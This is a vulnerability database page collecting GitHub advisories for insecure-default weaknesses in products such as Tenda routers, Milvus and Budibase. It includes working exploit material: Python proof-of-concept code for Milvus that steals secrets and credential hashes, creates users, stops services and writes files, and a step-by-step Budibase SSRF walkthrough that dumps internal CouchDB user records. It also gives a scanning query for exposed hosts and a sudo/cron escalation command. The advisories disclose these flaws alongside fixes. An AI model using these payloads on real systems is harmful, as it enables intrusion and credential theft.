Common Weakness Enumeration

CWE-1188

Allowed

Initialization of a Resource with an Insecure Default

Abstraction: Base · Status: Incomplete

The product initializes or sets a resource with a default that is intended to be changed by the product's installer, administrator, or maintainer, but the default is not secure.

402 vulnerabilities reference this CWE, most recent first.

GHSA-79FV-QMJ9-H56M

Vulnerability from github – Published: 2022-05-13 01:52 – Updated: 2022-05-13 01:52
VLAI
Details

An issue was discovered on Tenda AC15 devices. A remote, unauthenticated attacker can make a request to /goform/telnet, creating a telnetd service on the device. This service is password protected; however, several default accounts exist on the device that are root accounts, which can be used to log in.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-5770"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1188"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-03-20T15:29:00Z",
    "severity": "CRITICAL"
  },
  "details": "An issue was discovered on Tenda AC15 devices. A remote, unauthenticated attacker can make a request to /goform/telnet, creating a telnetd service on the device. This service is password protected; however, several default accounts exist on the device that are root accounts, which can be used to log in.",
  "id": "GHSA-79fv-qmj9-h56m",
  "modified": "2022-05-13T01:52:54Z",
  "published": "2022-05-13T01:52:54Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-5770"
    },
    {
      "type": "WEB",
      "url": "https://www.fidusinfosec.com/tenda-ac15-unauthenticated-telnetd-start-cve-2018-5770"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-7F8X-63VW-V3V9

Vulnerability from github – Published: 2022-05-13 00:00 – Updated: 2022-05-26 00:01
VLAI
Details

Insecure default variable initialization of Intel(R) RealSense(TM) ID Solution F450 before version 2.6.0.74 may allow an unauthenticated user to potentially enable information disclosure via physical access.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-33130"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1188",
      "CWE-665"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-05-12T17:15:00Z",
    "severity": "MODERATE"
  },
  "details": "Insecure default variable initialization of Intel(R) RealSense(TM) ID Solution F450 before version 2.6.0.74 may allow an unauthenticated user to potentially enable information disclosure via physical access.",
  "id": "GHSA-7f8x-63vw-v3v9",
  "modified": "2022-05-26T00:01:05Z",
  "published": "2022-05-13T00:00:47Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-33130"
    },
    {
      "type": "WEB",
      "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00595.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-7G9Q-WW3R-J77G

Vulnerability from github – Published: 2025-04-17 18:31 – Updated: 2025-04-25 18:31
VLAI
Details

In JetBrains RubyMine before 2025.1 remote Interpreter overwrote ports to listen on all interfaces

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-43015"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1188"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-04-17T16:16:00Z",
    "severity": "HIGH"
  },
  "details": "In JetBrains RubyMine before 2025.1 remote Interpreter overwrote ports to listen on all interfaces",
  "id": "GHSA-7g9q-ww3r-j77g",
  "modified": "2025-04-25T18:31:10Z",
  "published": "2025-04-17T18:31:22Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-43015"
    },
    {
      "type": "WEB",
      "url": "https://www.jetbrains.com/privacy-security/issues-fixed"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-7GMC-347M-8MWF

Vulnerability from github – Published: 2022-05-24 16:44 – Updated: 2024-04-04 00:06
VLAI
Details

An issue was discovered on Cerner Connectivity Engine (CCE) 4 devices. The user running the main CCE firmware has NOPASSWD sudo privileges to several utilities that could be used to escalate privileges to root. One example is the "sudo ln -s /tmp/script /etc/cron.hourly/script" command.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-20052"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1188"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-04-25T16:29:00Z",
    "severity": "HIGH"
  },
  "details": "An issue was discovered on Cerner Connectivity Engine (CCE) 4 devices. The user running the main CCE firmware has NOPASSWD sudo privileges to several utilities that could be used to escalate privileges to root. One example is the \"sudo ln -s /tmp/script /etc/cron.hourly/script\" command.",
  "id": "GHSA-7gmc-347m-8mwf",
  "modified": "2024-04-04T00:06:35Z",
  "published": "2022-05-24T16:44:36Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-20052"
    },
    {
      "type": "WEB",
      "url": "https://www.securifera.com/advisories/cve-2018-20052-20053"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-7PPG-37FH-VCR6

Vulnerability from github – Published: 2026-02-11 19:49 – Updated: 2026-07-06 15:17
VLAI
Summary
Milvus: Unauthenticated Access to Restful API on Metrics Port (9091) Leads to Critical System Compromise
Details

Summary

Milvus exposes TCP port 9091 by default with two critical authentication bypass vulnerabilities:

  1. The /expr debug endpoint uses a weak, predictable default authentication token derived from etcd.rootPath (default: by-dev), enabling arbitrary expression evaluation.
  2. The full REST API (/api/v1/*) is registered on the metrics/management port without any authentication, allowing unauthenticated access to all business operations including data manipulation and credential management.

Details

Vulnerability 1: Weak Default Authentication on /expr Endpoint

The /expr endpoint on port 9091 accepts an auth parameter that defaults to the etcd.rootPath value (by-dev). This value is well-known and predictable. An attacker who can reach port 9091 can evaluate arbitrary internal Go expressions, leading to:

  • Information/Credential Disclosure: Reading internal configuration values (MinIO secrets, etcd credentials) and user credential hashes via param.MinioCfg.SecretAccessKey.GetValue(), rootcoord.meta.GetCredential(ctx, 'root'), etc.
  • Denial of Service: Invoking proxy.Stop() to shut down the proxy service.
  • Arbitrary File Write (potential RCE): Manipulating access log configuration parameters to write arbitrary content to arbitrary file paths on the server filesystem.

Vulnerability 2: Unauthenticated REST API on Metrics Port

Business-logic HTTP handlers (collection management, data insertion, credential management) are registered on the metrics/management HTTP server at port 9091 via registerHTTPServer() in internal/distributed/proxy/service.go (line 170). These endpoints do not enforce any authentication, even when Milvus authentication is enabled on the primary gRPC/HTTP ports.

An attacker can perform any business operation without credentials, including:

  • Creating, listing, and deleting collections
  • Inserting and querying data
  • Creating, listing, and deleting user credentials
  • Modifying user passwords

Proof of Concept

PoC 1 — /expr Endpoint Exploitation

import requests

url = "http://<target>:9091/expr"

# Leak sensitive configuration (e.g., MinIO secret key)
res = requests.get(url, params={
    "auth": "by-dev",
    "code": "param.MinioCfg.SecretAccessKey.GetValue()"
}, timeout=5)
print(res.json().get("output", ""))

# Retrieve hashed credentials for the root user
res = requests.get(url, params={
    "auth": "by-dev",
    "code": "rootcoord.meta.GetCredential(ctx, 'root')"
}, timeout=5)
print(res.json().get("output", ""))

# Denial of Service — stop the proxy
res = requests.get(url, params={
    "auth": "by-dev",
    "code": "proxy.Stop()"
}, timeout=5)

# Arbitrary file write (potential RCE)
for cmd in [
    'param.Save("proxy.accessLog.localPath", "/tmp")',
    'param.Save("proxy.accessLog.formatters.base.format", "whoami")',
    'param.Save("proxy.accessLog.filename", "evil.sh")',
    'querycoord.etcdCli.KV.Put(ctx, "by-dev/config/proxy/accessLog/enable", "true")'
]:
    requests.get(url, params={"auth": "by-dev", "code": cmd}, timeout=5)

PoC 2 — Unauthenticated REST API Access

import requests

target_url = "http://<target>:9091"

# Create a user without any authentication
res = requests.post(f"{target_url}/api/v1/credential", json={
    "username": "attacker_user",
    "password": "MTIzNDU2Nzg5",
})
print(res.json())

# List all users
res = requests.get(f"{target_url}/api/v1/credential/users")
print(res.json())  # {'status': {}, 'usernames': ['root', 'attacker_user']}

# Create and delete collections, insert data — all without authentication

Internet Exposure

A significant number of publicly exposed Milvus instances are discoverable via internet-wide scanning using the pattern:

http.body="404 page not found" && port="9091"

This indicates the vulnerability is actively exploitable in real-world production environments.

Impact

An unauthenticated remote attacker with network access to port 9091 can:

  1. Exfiltrate secrets and credentials — MinIO keys, etcd credentials, user password hashes, and all internal configuration values.
  2. Manipulate all data — Create, modify, and delete collections, insert or remove data, bypassing all application-level access controls.
  3. Manage user accounts — Create administrative users, reset passwords, and escalate privileges.
  4. Cause denial of service — Shut down proxy services, drop databases, or corrupt metadata.
  5. Write arbitrary files — Potentially achieve remote code execution by writing malicious files to the filesystem via access log configuration manipulation.

Remediation

Recommended Fixes

  1. Remove or disable the /expr endpoint in production builds. If retained for debugging, it must require strong, non-default authentication and be disabled by default.
  2. Do not register business API routes on the metrics port. Separate the metrics/health endpoints from the application REST API to ensure authentication middleware applies consistently.
  3. Bind port 9091 to localhost by default (127.0.0.1:9091) so it is not externally accessible unless explicitly configured.
  4. Enforce authentication on all API endpoints, regardless of which port they are served on.

User Mitigations (until patched)

  • Block external access to port 9091 using firewall rules or network policies.
  • If running in Docker/Kubernetes, do not expose port 9091 outside the internal network.
  • Change the etcd.rootPath from the default value by-dev to a strong, random value (partial mitigation only — does not address the unauthenticated REST API).

Credit

This vulnerability was discovered and responsibly reported by YingLin Xie (xieyinglin@hust.edu.cn). It was independently reported by 0x1f and zznQ (ac0d3r).

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/milvus-io/milvus"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.5.27"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/milvus-io/milvus"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.6.0"
            },
            {
              "fixed": "2.6.10"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-26190"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-306",
      "CWE-749",
      "CWE-1188"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-11T19:49:44Z",
    "nvd_published_at": "2026-02-13T19:17:29Z",
    "severity": "CRITICAL"
  },
  "details": "## Summary\n\nMilvus exposes TCP port 9091 by default with two critical authentication bypass vulnerabilities:\n\n1. The `/expr` debug endpoint uses a weak, predictable default authentication token derived from `etcd.rootPath` (default: `by-dev`), enabling arbitrary expression evaluation.\n2. The full REST API (`/api/v1/*`) is registered on the metrics/management port without any authentication, allowing unauthenticated access to all business operations including data manipulation and credential management.\n\n## Details\n\n### Vulnerability 1: Weak Default Authentication on `/expr` Endpoint\n\nThe `/expr` endpoint on port 9091 accepts an `auth` parameter that defaults to the `etcd.rootPath` value (`by-dev`). This value is well-known and predictable. An attacker who can reach port 9091 can evaluate arbitrary internal Go expressions, leading to:\n\n- **Information/Credential Disclosure**: Reading internal configuration values (MinIO secrets, etcd credentials) and user credential hashes via `param.MinioCfg.SecretAccessKey.GetValue()`, `rootcoord.meta.GetCredential(ctx, \u0027root\u0027)`, etc.\n- **Denial of Service**: Invoking `proxy.Stop()` to shut down the proxy service.\n- **Arbitrary File Write (potential RCE)**: Manipulating access log configuration parameters to write arbitrary content to arbitrary file paths on the server filesystem.\n\n### Vulnerability 2: Unauthenticated REST API on Metrics Port\n\nBusiness-logic HTTP handlers (collection management, data insertion, credential management) are registered on the metrics/management HTTP server at port 9091 via `registerHTTPServer()` in [`internal/distributed/proxy/service.go` (line 170)](https://github.com/milvus-io/milvus/blob/9996e8d1cebff7e7108bcb16d43124236de77438/internal/distributed/proxy/service.go#L170). These endpoints do not enforce any authentication, even when Milvus authentication is enabled on the primary gRPC/HTTP ports.\n\nAn attacker can perform any business operation without credentials, including:\n\n- Creating, listing, and deleting collections\n- Inserting and querying data\n- Creating, listing, and deleting user credentials\n- Modifying user passwords\n\n## Proof of Concept\n\n### PoC 1 \u2014 `/expr` Endpoint Exploitation\n\n```python\nimport requests\n\nurl = \"http://\u003ctarget\u003e:9091/expr\"\n\n# Leak sensitive configuration (e.g., MinIO secret key)\nres = requests.get(url, params={\n    \"auth\": \"by-dev\",\n    \"code\": \"param.MinioCfg.SecretAccessKey.GetValue()\"\n}, timeout=5)\nprint(res.json().get(\"output\", \"\"))\n\n# Retrieve hashed credentials for the root user\nres = requests.get(url, params={\n    \"auth\": \"by-dev\",\n    \"code\": \"rootcoord.meta.GetCredential(ctx, \u0027root\u0027)\"\n}, timeout=5)\nprint(res.json().get(\"output\", \"\"))\n\n# Denial of Service \u2014 stop the proxy\nres = requests.get(url, params={\n    \"auth\": \"by-dev\",\n    \"code\": \"proxy.Stop()\"\n}, timeout=5)\n\n# Arbitrary file write (potential RCE)\nfor cmd in [\n    \u0027param.Save(\"proxy.accessLog.localPath\", \"/tmp\")\u0027,\n    \u0027param.Save(\"proxy.accessLog.formatters.base.format\", \"whoami\")\u0027,\n    \u0027param.Save(\"proxy.accessLog.filename\", \"evil.sh\")\u0027,\n    \u0027querycoord.etcdCli.KV.Put(ctx, \"by-dev/config/proxy/accessLog/enable\", \"true\")\u0027\n]:\n    requests.get(url, params={\"auth\": \"by-dev\", \"code\": cmd}, timeout=5)\n```\n\n### PoC 2 \u2014 Unauthenticated REST API Access\n\n```python\nimport requests\n\ntarget_url = \"http://\u003ctarget\u003e:9091\"\n\n# Create a user without any authentication\nres = requests.post(f\"{target_url}/api/v1/credential\", json={\n    \"username\": \"attacker_user\",\n    \"password\": \"MTIzNDU2Nzg5\",\n})\nprint(res.json())\n\n# List all users\nres = requests.get(f\"{target_url}/api/v1/credential/users\")\nprint(res.json())  # {\u0027status\u0027: {}, \u0027usernames\u0027: [\u0027root\u0027, \u0027attacker_user\u0027]}\n\n# Create and delete collections, insert data \u2014 all without authentication\n```\n\n## Internet Exposure\n\nA significant number of publicly exposed Milvus instances are discoverable via internet-wide scanning using the pattern:\n\n```\nhttp.body=\"404 page not found\" \u0026\u0026 port=\"9091\"\n```\n\nThis indicates the vulnerability is actively exploitable in real-world production environments.\n\n## Impact\n\nAn unauthenticated remote attacker with network access to port 9091 can:\n\n1. **Exfiltrate secrets and credentials** \u2014 MinIO keys, etcd credentials, user password hashes, and all internal configuration values.\n2. **Manipulate all data** \u2014 Create, modify, and delete collections, insert or remove data, bypassing all application-level access controls.\n3. **Manage user accounts** \u2014 Create administrative users, reset passwords, and escalate privileges.\n4. **Cause denial of service** \u2014 Shut down proxy services, drop databases, or corrupt metadata.\n5. **Write arbitrary files** \u2014 Potentially achieve remote code execution by writing malicious files to the filesystem via access log configuration manipulation.\n\n## Remediation\n\n### Recommended Fixes\n\n1. **Remove or disable the `/expr` endpoint** in production builds. If retained for debugging, it must require strong, non-default authentication and be disabled by default.\n2. **Do not register business API routes on the metrics port.** Separate the metrics/health endpoints from the application REST API to ensure authentication middleware applies consistently.\n3. **Bind port 9091 to localhost by default** (`127.0.0.1:9091`) so it is not externally accessible unless explicitly configured.\n4. **Enforce authentication on all API endpoints**, regardless of which port they are served on.\n\n### User Mitigations (until patched)\n\n- Block external access to port 9091 using firewall rules or network policies.\n- If running in Docker/Kubernetes, do not expose port 9091 outside the internal network.\n- Change the `etcd.rootPath` from the default value `by-dev` to a strong, random value (partial mitigation only \u2014 does not address the unauthenticated REST API).\n\n## Credit\n\nThis vulnerability was discovered and responsibly reported by **YingLin Xie** (xieyinglin@hust.edu.cn). It was independently reported by [0x1f](https://github.com/0x1f) and zznQ ([ac0d3r](https://github.com/ac0d3r)).",
  "id": "GHSA-7ppg-37fh-vcr6",
  "modified": "2026-07-06T15:17:07Z",
  "published": "2026-02-11T19:49:44Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/milvus-io/milvus/security/advisories/GHSA-7ppg-37fh-vcr6"
    },
    {
      "type": "WEB",
      "url": "https://github.com/milvus-io/milvus/commit/92b74dd2e286006a83b4a5f07951027b32e718a9"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/milvus-io/milvus"
    },
    {
      "type": "WEB",
      "url": "https://github.com/milvus-io/milvus/releases/tag/v2.5.27"
    },
    {
      "type": "WEB",
      "url": "https://github.com/milvus-io/milvus/releases/tag/v2.6.10"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Milvus: Unauthenticated Access to Restful API on Metrics Port (9091) Leads to Critical System Compromise"
}

GHSA-7R9J-R86Q-7G45

Vulnerability from github – Published: 2026-04-03 21:34 – Updated: 2026-04-03 21:34
VLAI
Summary
Budibase: Server-Side Request Forgery via REST Connector with Empty Default Blacklist
Details

1. Summary

Field Value
Title SSRF via REST Connector with Empty Default Blacklist Leading to Full Internal Data Exfiltration
Product Budibase
Version 3.30.6 (latest stable as of 2026-02-25)
Component REST Datasource Integration + Backend-Core Blacklist Module
Severity Critical
Attack Vector Network
Privileges Required Low (Builder role, or QUERY WRITE for execution of pre-existing queries)
User Interaction None
Affected Deployments All self-hosted instances without explicit BLACKLIST_IPS configuration (believed to be the vast majority)

2. Description

A critical Server-Side Request Forgery (SSRF) vulnerability exists in Budibase's REST datasource connector. The platform's SSRF protection mechanism (IP blacklist) is rendered completely ineffective because the BLACKLIST_IPS environment variable is not set by default in any of the official deployment configurations. When this variable is empty, the blacklist function unconditionally returns false, allowing all requests through without restriction.

This allows any user with Builder privileges (or QUERY WRITE permission on an existing query) to create REST datasources pointing to arbitrary internal network services, execute queries against them, and fully exfiltrate the responses — including credentials, database contents, and internal service metadata.

The vulnerability is particularly severe because: 1. The CouchDB backend stores all user credentials (bcrypt hashes), platform configurations, and application data 2. CouchDB credentials are embedded in the environment variables visible to the application container 3. A successful exploit grants full read/write access to the entire Budibase data layer


3. Root Cause Analysis

3.1 Blacklist Implementation

File: packages/backend-core/src/blacklist/blacklist.ts

// Line 23-37: Blacklist refresh reads from environment variable
export async function refreshBlacklist() {
  const blacklist = env.BLACKLIST_IPS           // ← reads BLACKLIST_IPS
  const list = blacklist?.split(",") || []       // ← empty array if unset
  let final: string[] = []
  for (let addr of list) {
    // ... resolves domains to IPs
  }
  blackListArray = final                         // ← empty array
}

// Line 39-54: Blacklist check
export async function isBlacklisted(address: string): Promise<boolean> {
  if (!blackListArray) {
    await refreshBlacklist()
  }
  if (blackListArray?.length === 0) {
    return false                                 // ← ALWAYS returns false when empty
  }
  // ... rest of check never executes
}

Problem: When BLACKLIST_IPS is not set (the default), blackListArray is initialized as an empty array, and isBlacklisted() unconditionally returns false for every URL.

3.2 Default Configuration Missing BLACKLIST_IPS

File: hosting/.env (official Docker Compose deployment template)

MAIN_PORT=10000
API_ENCRYPTION_KEY=testsecret
JWT_SECRET=testsecret
MINIO_ACCESS_KEY=budibase
MINIO_SECRET_KEY=budibase
COUCH_DB_PASSWORD=budibase
COUCH_DB_USER=budibase
REDIS_PASSWORD=budibase
INTERNAL_API_KEY=budibase
# ... (19 other variables)
# BLACKLIST_IPS is NOT present

No default private IP ranges (RFC1918, localhost, cloud metadata) are hardcoded as fallback.

3.3 REST Integration Blacklist Check

File: packages/server/src/integrations/rest.ts

// Line 684-686: Blacklist check before fetch
const url = this.getUrl(path, queryString, pagination, paginationValues)
if (await blacklist.isBlacklisted(url)) {     // ← always false
  throw new Error("Cannot connect to URL.")   // ← never reached
}
// Line 708:
response = await fetch(url, input)             // ← unrestricted fetch

3.4 Authorization Model

Operation Endpoint Required Permission
Create datasource POST /api/datasources BUILDER (app-level)
Create query POST /api/queries BUILDER (app-level)
Execute query POST /api/v2/queries/:id QUERY WRITE (can be granted to any app user)

Route definitions: - packages/server/src/api/routes/datasource.ts:19builderRoutes - packages/server/src/api/routes/query.ts:33builderRoutes (create) - packages/server/src/api/routes/query.ts:55-66writeRoutes with PermissionType.QUERY, PermissionLevel.WRITE (execute)

Key insight: The BUILDER role is an app-level permission, significantly lower than GLOBAL_BUILDER (platform admin). In multi-user environments, builders are expected to create app logic but are NOT expected to have access to infrastructure-level data.


4. Impact Analysis

4.1 Confidentiality — Critical

An attacker can read: - All CouchDB databases (/_all_dbs) - User credentials including bcrypt password hashes, email addresses (/global-db/_all_docs?include_docs=true) - Platform configuration including encryption keys, JWT secrets - All application data across every app in the instance - Internal service metadata (MinIO storage, Redis)

4.2 Integrity — High

Through CouchDB's HTTP API (which supports PUT/POST/DELETE), an attacker can: - Modify user records to escalate privileges - Create new admin accounts directly in CouchDB - Alter application data in any app's database - Delete databases causing data loss

4.3 Availability — Medium

  • Resource exhaustion by making the server proxy large responses from internal services
  • Database destruction via CouchDB DELETE operations
  • Service disruption by modifying critical configuration documents

4.4 Scope Change

The vulnerability crosses the security boundary between the Budibase application layer and the infrastructure layer. A Builder user should only be able to configure app-level logic, but this vulnerability grants direct access to: - CouchDB (database layer) - MinIO (storage layer) - Redis (cache/session layer) - Any other service accessible from the Docker network


5. Proof of Concept

5.1 Environment Setup

cd hosting/
docker compose up -d
# Wait for services to start
# Create admin account via POST /api/global/users/init
# Login to obtain session cookie

Tested on: Budibase v3.30.6, Docker Compose deployment with default hosting/.env

5.2 Step 1 — Create REST Datasource Targeting Internal CouchDB

POST /api/datasources HTTP/1.1
Host: localhost:10000
Content-Type: application/json
Cookie: budibase:auth=<session_token>
x-budibase-app-id: <app_id>

{
  "datasource": {
    "name": "Internal CouchDB",
    "source": "REST",
    "type": "datasource",
    "config": {
      "url": "http://couchdb-service:5984",
      "defaultHeaders": {}
    }
  }
}

Response (201 — datasource created successfully):

{
  "datasource": {
    "_id": "datasource_4530e34a8b2e423f8f8eb53e2b2cefc6",
    "name": "Internal CouchDB",
    "source": "REST",
    "config": { "url": "http://couchdb-service:5984" }
  }
}

No warning, no validation error — an internal hostname is accepted without restriction.

5.3 Step 2 — Query CouchDB Version (Confirm Connectivity)

Create and execute a query to GET /:

POST /api/v2/queries/<query_id> HTTP/1.1

Response — Internal CouchDB data returned to the attacker:

{
  "data": [{
    "couchdb": "Welcome",
    "version": "3.3.3",
    "git_sha": "40afbcfc7",
    "uuid": "9cd97b58e2cef72e730a83247c377d2b",
    "features": ["search","access-ready","partitioned",
                 "pluggable-storage-engines","reshard","scheduler"],
    "vendor": {"name": "The Apache Software Foundation"}
  }],
  "code": 200,
  "time": "44ms"
}

5.4 Step 3 — Enumerate All Databases

Query: GET /_all_dbs with CouchDB admin credentials (from .env: budibase:budibase)

{
  "data": [
    {"value": "_replicator"},
    {"value": "_users"},
    {"value": "app_dev_3eeb8d7949074250ae62f206ad0b61a5"},
    {"value": "app_dev_5135f7f368bc4701a7f163baaf22f1b7"},
    {"value": "global-db"},
    {"value": "global-info"}
  ]
}

5.5 Step 4 — Exfiltrate User Credentials and Platform Secrets

Query: GET /global-db/_all_docs?include_docs=true&limit=20 Headers: Authorization: Basic YnVkaWJhc2U6YnVkaWJhc2U= (budibase:budibase)

Response — Full user record with bcrypt hash:

{
  "data": [{
    "total_rows": 4,
    "rows": [
      {
        "id": "config_settings",
        "doc": {
          "_id": "config_settings",
          "type": "settings",
          "config": {
            "platformUrl": "http://localhost:10000",
            "uniqueTenantId": "23ba9844703049778d75372e720c7169_default"
          }
        }
      },
      {
        "id": "us_09c5f0a89b7f40c19db863e1aaaf90fd",
        "doc": {
          "_id": "us_09c5f0a89b7f40c19db863e1aaaf90fd",
          "email": "admin@test.com",
          "password": "$2b$10$uQl69b/H22QnV61qZE2OmuChFAca43yicgorlJBwwNinJwQcOiPbK",
          "builder": {"global": true},
          "admin": {"global": true},
          "tenantId": "default",
          "status": "active"
        }
      },
      {
        "id": "usage_quota",
        "doc": {
          "_id": "usage_quota",
          "quotaReset": "2026-03-01T00:00:00.000Z",
          "usageQuota": {"apps": 2, "users": 1, "creators": 1}
        }
      }
    ]
  }]
}

Exfiltrated data includes: - Admin email: admin@test.com - Bcrypt password hash: $2b$10$uQl69b/H22QnV61qZE2OmuChFAca43yicgorlJBwwNinJwQcOiPbK - Role information: builder.global: true, admin.global: true - Tenant ID, platform URL, quota information

5.6 Step 5 — Access Other Internal Services

MinIO (Object Storage):

Datasource URL: http://minio-service:9000
Response: {"Code":"BadRequest","Message":"An unsupported API call..."}
Server header: MinIO

Confirms MinIO is reachable. With proper S3 API signatures, bucket contents could be listed and files exfiltrated.

Redis (Port Scanning):

Datasource URL: http://redis-service:6379
Response: "fetch failed" (Redis speaks non-HTTP protocol)

Different error from non-existent host → confirms service discovery capability.

Non-existent service:

Datasource URL: http://nonexistent-service:12345
Response: "fetch failed"

5.7 Service Discovery Matrix

Target URL Response Service Confirmed
CouchDB http://couchdb-service:5984/ {"couchdb":"Welcome","version":"3.3.3"} Yes — full data access
MinIO http://minio-service:9000/ XML error with Server: MinIO header Yes — storage access
Redis http://redis-service:6379/ socket hang up / fetch failed Yes — port open
Non-existent http://nonexistent:12345/ fetch failed (ENOTFOUND) No — different error

This differential response enables internal network mapping.


6. Attack Scenarios

Scenario A: Builder User Steals All Credentials

  1. User has Builder role for one app
  2. Creates REST datasource → http://couchdb-service:5984
  3. Queries global-db to get all user records with password hashes
  4. Cracks bcrypt hashes offline or directly modifies user records via CouchDB PUT

Scenario B: Chained with CVE-2026-25040 (Unpatched Privilege Escalation)

  1. Attacker has Creator role (lower than Builder)
  2. Exploits CVE-2026-25040 to invite themselves as Admin
  3. Now has Builder access → exploits this SSRF
  4. Complete instance takeover

Scenario C: Cloud Metadata Exfiltration (AWS/GCP/Azure)

  1. On cloud-hosted instances, datasource URL: http://169.254.169.254/latest/meta-data/
  2. Retrieves IAM credentials, instance metadata
  3. Pivots to cloud infrastructure

7. Affected Code Paths

User Request
    │
    ▼
POST /api/datasources                          [BUILDER permission]
    │  packages/server/src/api/routes/datasource.ts:32
    │  → No URL validation on datasource.config.url
    ▼
POST /api/v2/queries/:queryId                  [QUERY WRITE permission]
    │  packages/server/src/api/routes/query.ts:63
    ▼
packages/server/src/threads/query.ts
    │  → Executes query via REST integration
    ▼
packages/server/src/integrations/rest.ts
    │  Line 684: blacklist.isBlacklisted(url)   → returns false (empty list)
    │  Line 708: fetch(url, input)              → unrestricted request
    ▼
Internal Service (CouchDB, MinIO, Redis, etc.)
    │
    ▼
Response returned to attacker via query results

8. Recommended Fixes

Fix 1 (Critical): Add Default Private IP Blocklist

// packages/backend-core/src/blacklist/blacklist.ts

const DEFAULT_BLOCKED_RANGES = [
  "127.0.0.0/8",       // localhost
  "10.0.0.0/8",        // RFC1918
  "172.16.0.0/12",     // RFC1918
  "192.168.0.0/16",    // RFC1918
  "169.254.0.0/16",    // link-local / cloud metadata
  "0.0.0.0/8",         // current network
  "::1/128",           // IPv6 localhost
  "fc00::/7",          // IPv6 private
  "fe80::/10",         // IPv6 link-local
]

export async function isBlacklisted(address: string): Promise<boolean> {
  // Always check against default blocked ranges
  // even when BLACKLIST_IPS is not configured
  const ips = await resolveToIPs(address)
  for (const ip of ips) {
    if (isInRange(ip, DEFAULT_BLOCKED_RANGES)) {
      return true
    }
  }
  // Then check user-configured blacklist
  // ...existing logic...
}

Fix 2 (High): Validate Datasource URLs at Creation Time

// packages/server/src/api/controllers/datasource.ts

async function save(ctx) {
  const { config } = ctx.request.body.datasource
  if (config?.url) {
    if (await blacklist.isBlacklisted(config.url)) {
      ctx.throw(400, "Cannot create datasource targeting internal network")
    }
  }
  // ... existing logic
}

Fix 3 (Medium): Add DNS Rebinding Protection

Resolve the target hostname at request time and re-check the resolved IP against the blacklist, preventing DNS rebinding attacks where the first lookup returns a public IP but the actual request resolves to an internal IP.

Fix 4 (Medium): Disable HTTP Redirects or Re-validate After Redirect

Ensure that if a response redirects to an internal IP, the redirect target is also checked against the blacklist.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@budibase/backend-core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.33.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-31818"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1188",
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-03T21:34:44Z",
    "nvd_published_at": "2026-04-03T16:16:39Z",
    "severity": "CRITICAL"
  },
